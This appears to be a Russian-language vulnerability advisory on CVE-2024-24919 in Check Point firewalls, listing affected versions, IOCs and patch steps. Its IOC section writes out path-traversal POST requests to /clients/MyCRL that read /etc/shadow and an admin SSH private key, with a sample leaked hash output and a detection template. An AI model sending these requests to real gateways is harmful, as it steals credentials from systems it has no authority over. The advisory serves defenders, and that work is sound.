1. Описание зафиксированной угрозы

[Название угрозы]: Критичная уязвимость в межсетевых экранах Check Point

[Тип угрозы]: Уязвимость раскрытия информации, обхода пути (Path Traversal Attack)

[CVE]: CVE-2024-24919

[CVSS vector]: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

[Platform]: Check Point

[Product]: CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances

[Version]: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20

[Severity]: 7.5/10

[Дата обнаружения]: 05/2024

Исследователи ИБ-компании Mnemonic заявили, что успешная эксплуатация уязвимости позволяет злоумышленнику перечислить и извлечь хэши паролей для всех локальных учетных записей, включая учетную запись, используемую для подключения к Active Directory. Полный масштаб последствий пока неизвестен. Однако известно, что можно извлечь хэши паролей устаревших локальных пользователей с проверкой подлинности только по паролю, включая учетные записи служб, используемые для подключения к Active Directory. Слабые пароли могут быть скомпрометированы, что приведет к потенциальному горизонтальному перемещению в сети.

2. Технические детали угрозы

2.1 Сведения об уязвимости

Злоумышленники активно эксплуатируют уязвимость в «дикой природе»:

CVE-2024-24919

Описание из Банка данных угроз:

Уязвимость межсетевых экранов Check Point Quantum Gateway и Check Point Spark, комплексной системы безопасности CloudGuard Network связана с отсутствием защиты служебных данных. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, получить доступ к защищаемой информации.

Уязвимый модуль: /clients/MyCRL

2.2 Сведения об атаках

По информации от компании Mnemonic, злоумышленники в своих атаках извлекали ntds.dit в течение 2-3 часов после входа в систему с помощью локального пользователя. Также с помощью Visual Studio злоумышленники реализовывали туннелирование вредоносного трафика. 

2.3 Сведения об используемом ВПО и индикаторах компрометации

Примеры запросов, на которые необходимо обратить внимание:

POST /clients/MyCRL HTTP/1.1

Host: <redacted>

Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

POST /clients/MyCRL HTTP/1.1

Host: <redacted>

Content-Length: 39

aCSHELL/../../../../../../../home/admin/.ssh/id_rsa

Пример результата:
HTTP/1.0 200 OK

Date: Thu, 30 May 2024 01:38:29 GMT

Server: Check Point SVN foundation

Content-Type: text/html

X-UA-Compatible: IE=EmulateIE7

Connection: close

X-Frame-Options: SAMEORIGIN

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 505

admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::

monitor:*:19872:0:99999:8:::

root:*:19872:0:99999:7:::

nobody:*:19872:0:99999:7:::

postfix:*:19872:0:99999:7:::

rpm:!!:19872:0:99999:7:::

shutdown:*:19872:0:99999:7:::

pcap:!!:19872:0:99999:7:::

halt:*:19872:0:99999:7:::

cp_postgres:*:19872:0:99999:7:::

cpep_user:*:19872:0:99999:7:::

vcsa:!!:19872:0:99999:7:::

_nonlocl:*:19872:0:99999:7:::

sshd:*:19872:0:99999:7:::

Шаблон для поиска CVE-2024-24919:

id: CVE-2024-24919

info:

  name: Path Traversal + Local File Inclusion

  author: cerberus

  severity: high


requests:

  - raw:

      - |

        POST /clients/MyCRL HTTP/1.1

        Host: {{Hostname}}

        Content-Type: application/x-www-form-urlencoded


        aCSHELL/../../../../../../../etc/hosts


    matchers:

      - type: status

        status:

          - 200


IOC [IP]:

82.180.133[.] 120

87.120.8[.] 173

23.227.203[.] 36

203.160.68[.] 12


3. Рекомендации по устранению

Для устранения данной уязвимости мы рекомендуем вам выполнить установку патча безопасности.

Ниже предоставлен список версий, на которые в данный момент имеется патч безопасности. 

Quantum Security Gateway:

  • R81.20 Jumbo Hotfix Accumulator Take 54          
  • R81.20 Jumbo Hotfix Accumulator Take 41          
  • R81.20 Jumbo Hotfix Accumulator Take 53          
  • R81.20 Jumbo Hotfix Accumulator Take 26          
  • R81.10 Jumbo Hotfix Accumulator Take 141        
  • R81.10 Jumbo Hotfix Accumulator Take 139        
  • R81.10 Jumbo Hotfix Accumulator Take 130        
  • R81.10 Jumbo Hotfix Accumulator Take 110        
  • R81 Jumbo Hotfix Accumulator Take 92                
  • R80.40 Jumbo Hotfix Accumulator Take 211        
  • R80.40 Jumbo Hotfix Accumulator Take 206        
  • R80.40 Jumbo Hotfix Accumulator Take 198        
  • R80.40 Jumbo Hotfix Accumulator Take 197

Quantum Maestro and Quantum Scalable Chassis:

  • R80.30SP Jumbo Hotfix Accumulator Take 97 
  • R80.20SP Jumbo Hotfix Accumulator Take 336

Quantum Spark Gateways:

  • R81.10.10 Quantum Spark Appliances   
  • R81.10.08 Quantum Spark Appliances   
  • R80.20.60 Quantum Spark Appliances   
  • R77.20.87 Quantum Spark Appliances   
  • R77.20.81 Quantum Spark Appliances 


Для версий R77.30 патча безопасности не предусмотрено.

Для версии R77.30 и ниже мы рекомендуем обновить версию операционной системы до актуальной.

Для проверки версии операционной системы и установленного Jumbo Hotfix необходимо выполнить следующее: 

1 вариант: 

• Выполнить подключение к WEB-GUI шлюза безопасности

• Перейти в раздел Overview -> System Overview -> Version



  • Либо перейти в раздел Upgrades (CPUSE) -> Status and Actions –> Status «Installed»


2 вариант: 

• Выполнить подключение по SSH к шлюзу безопасности

• В CLI выполнить команду: cpinfo –y all |grep HF

Пример: 

[Expert@GW-CHKP-A:0]# cpinfo -y all | grep HF

This is Check Point CPinfo Build 914000239 for GAIA
        HOTFIX_R81_10_JUMBO_HF_MAIN Take: 110
        HOTFIX_R81_10_JUMBO_HF_MAIN Take: 110
        HOTFIX_R81_10_JUMBO_HF_MAIN Take: 110
        HOTFIX_R81_10_JUMBO_HF_MAIN Take: 110
        HOTFIX_R81_10_JUMBO_HF_MAIN Take: 110
        BUNDLE_R81_10_JUMBO_HF_MAIN Take: 110
        HOTFIX_CHARON_HF

После определения версии нужно выполнить установку патча безопасности. 

Выполнить установку патча безопасности можно по инструкции.

В Web-GUI шлюза безопасности уже должны быть доступны данные патчи в разделе Upgrades (CPUSE) -> Status and Actions.


Важные дополнительные меры, которые рекомендует выполнить производитель в случае, если у вас используется LDAP Account unit (связь с Active Directory), а также используются локальные учетные записи (с методом аутентификации только по паролю) на шлюзе безопасности для подключения к VPN, доступны по ссылке (раздел Important extra measures).


4. Ссылки